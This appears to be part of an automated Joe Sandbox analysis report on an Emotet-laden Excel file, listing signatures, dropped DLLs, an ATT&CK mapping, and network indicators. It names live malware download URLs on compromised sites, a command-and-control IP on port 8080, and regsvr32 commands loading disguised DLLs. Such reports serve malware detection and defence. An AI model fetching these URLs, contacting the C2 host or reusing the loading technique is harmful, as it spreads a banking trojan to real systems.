                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,3_2_000007FEF9D30215
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000007FEF9D2BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7533280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000007FEF7533280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF753BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000007FEF753BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000007FEF74D3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000007FEF74D3280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000007FEF74DBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000007FEF74DBE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000007FEF70CBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000007FEF70CBE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000007FEF70C3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_000007FEF70C3280

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 165.22.73.229 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_000007FEF9D28900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation,3_2_000007FEF9D28860

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 10.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.3e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.regsvr32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.regsvr32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.300000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.944087304.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1219645231.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1218912030.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1218942103.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.951348566.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.926422500.0000000000300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.943168453.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1218930467.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1219706572.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Scripting                      		Path Interception111
                      Process Injection                      		131
                      Masquerading                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium1
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Disable or Modify Tools                      		LSASS Memory1
                      Query Registry                      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Non-Standard Port                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts43
                      Exploitation for Client Execution                      		Logon Script (Windows)Logon Script (Windows)1
                      Virtualization/Sandbox Evasion                      		Security Account Manager121
                      Security Software Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
                      Ingress Tool Transfer                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection                      		NTDS1
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Non-Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      Process Discovery                      		SSHKeyloggingData Transfer Size Limits22
                      Application Layer Protocol                      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Scripting                      		Cached Domain Credentials1
                      Remote System Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Hidden Files and Directories                      		DCSync2
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                      Obfuscated Files or Information                      		Proc Filesystem16
                      System Information Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Regsvr32                      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 632071 Sample: DETAILS 25922194612.xls Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 58 Multi AV Scanner detection for domain / URL 2->58 60 Antivirus detection for URL or domain 2->60 62 Multi AV Scanner detection for dropped file 2->62 64 10 other signatures 2->64 7 EXCEL.EXE 7 26 2->7         started        12 svchost.exe 2->12         started        process3 dnsIp4 50 kolejleri.com 85.114.142.153, 49174, 80 MYLOC-ASIPBackboneofmyLocmanagedITAGDE Germany 7->50 52 stainedglassexpress.com 66.71.247.68, 49175, 80 TOTAL-SERVER-SOLUTIONSUS United States 7->52 54 2 other IPs or domains 7->54 34 C:\Users\user\uxevr4.ocx, PE32+ 7->34 dropped 36 C:\Users\user\uxevr3.ocx, PE32+ 7->36 dropped 38 C:\Users\user\uxevr2.ocx, PE32+ 7->38 dropped 40 6 other malicious files 7->40 dropped 68 Document exploit detected (creates forbidden files) 7->68 70 Document exploit detected (UrlDownloadToFile) 7->70 14 regsvr32.exe 2 7->14         started        18 regsvr32.exe 2 7->18         started        20 regsvr32.exe 2 7->20         started        22 regsvr32.exe 2 7->22         started        file5 signatures6 process7 file8 42 C:\Windows\...\bTjwWDTWvnC.dll (copy), PE32+ 14->42 dropped 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->72 24 regsvr32.exe 14->24         started        44 C:\Windows\System32\...\rWFJGQNl.dll (copy), PE32+ 18->44 dropped 27 regsvr32.exe 2 18->27         started        46 C:\Windows\...\qlDqXeGagKnBKzd.dll (copy), PE32+ 20->46 dropped 30 regsvr32.exe 20->30         started        48 C:\Windows\System32\...\Wuiko.dll (copy), PE32+ 22->48 dropped 32 regsvr32.exe 22->32         started        signatures9 process10 dnsIp11 66 System process connects to network (likely due to code injection or exploit) 24->66 56 165.22.73.229, 49177, 49179, 49180 DIGITALOCEAN-ASNUS United States 27->56 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      DETAILS 25922194612.xls41%ReversingLabsDocument-Excel.Trojan.Abracadabra

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr3.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr1.ocx100%Joe Sandbox ML
                      C:\Users\user\uxevr4.ocx100%Joe Sandbox ML
                      C:\Users\user\uxevr2.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll29%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll61%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr1.ocx59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr2.ocx59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr3.ocx59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr4.ocx29%MetadefenderBrowse
                      C:\Users\user\uxevr4.ocx61%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy)59%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy)59%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy)59%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy)29%MetadefenderBrowse
                      C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy)61%ReversingLabsWin64.Trojan.Emotet

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.regsvr32.exe.300000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      11.2.regsvr32.exe.220000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      10.2.regsvr32.exe.2c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      7.2.regsvr32.exe.2c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      8.2.regsvr32.exe.2d0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      9.2.regsvr32.exe.150000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      4.2.regsvr32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      5.2.regsvr32.exe.3e0000.0.unpack100%AviraHEUR/AGEN.1215461Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      kolejleri.com12%VirustotalBrowse
                      milanstaffing.com7%VirustotalBrowse
                      learnviaonline.com9%VirustotalBrowse
                      stainedglassexpress.com5%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://learnviaonline.com/wp-admin/qGb/100%Avira URL Cloudmalware
                      https://165.22.73.229:8080/.t0%Avira URL Cloudsafe
                      https://165.22.73.229:8080/L0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://milanstaffing.com/images/D4TRnDubF/100%Avira URL Cloudmalware
                      https://165.22.73.229:8080/h0%Avira URL Cloudsafe
                      https://165.22.73.229/l0%Avira URL Cloudsafe
                      http://kolejleri.com/wp-admin/REvup/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://165.22.73.229:8080/0%Avira URL Cloudsafe
                      https://165.22.73.229/0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      https://165.22.73.229/5v0%Avira URL Cloudsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://165.22.73.229/KP0%Avira URL Cloudsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://165.22.73.229/=v0%Avira URL Cloudsafe
                      https://165.22.73.229:8080/1o0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      kolejleri.com
                      		85.114.142.153
                      		truetrueunknown
                      milanstaffing.com
                      		107.189.3.39
                      		truefalseunknown
                      learnviaonline.com
                      		103.171.181.223
                      		truefalseunknown
                      stainedglassexpress.com
                      		66.71.247.68
                      		truefalseunknown
                      windowsupdatebg.s.llnwi.net
                      		95.140.230.192
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://learnviaonline.com/wp-admin/qGb/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://milanstaffing.com/images/D4TRnDubF/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://kolejleri.com/wp-admin/REvup/true
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://165.22.73.229:8080/.tregsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://165.22.73.229:8080/Lregsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://165.22.73.229:8080/hregsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://165.22.73.229/lregsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://165.22.73.229:8080/regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://165.22.73.229/regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://165.22.73.229/5vregsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://165.22.73.229/KPregsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://165.22.73.229/=vregsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://165.22.73.229:8080/1oregsvr32.exe, 0000000B.00000002.1219557119.0000000002CE4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              85.114.142.153
                              		kolejleri.comGermany
                              		24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue
                              103.171.181.223
                              		learnviaonline.comunknown
                              		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                              107.189.3.39
                              		milanstaffing.comUnited States
                              		53667PONYNETUSfalse
                              165.22.73.229
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              66.71.247.68
                              		stainedglassexpress.comUnited States
                              		46562TOTAL-SERVER-SOLUTIONSUSfalse

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:632071
                              Start date and time: 23/05/202209:09:542022-05-23 09:09:54 +02:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 9m 49s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:DETAILS 25922194612.xls
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLS@18/18@5/5
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 57.8% (good quality ratio 31%)
                              • Quality average: 32.8%
                              • Quality standard deviation: 37.5%
                              HCA Information:
                              • Successful, ratio: 95%
                              • Number of executed functions: 37
                              • Number of non-executed functions: 252
                              Cookbook Comments:
                              • Found application associated with file extension: .xls
                              • Adjust boot time
                              • Enable AMSI
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210, 95.140.230.192
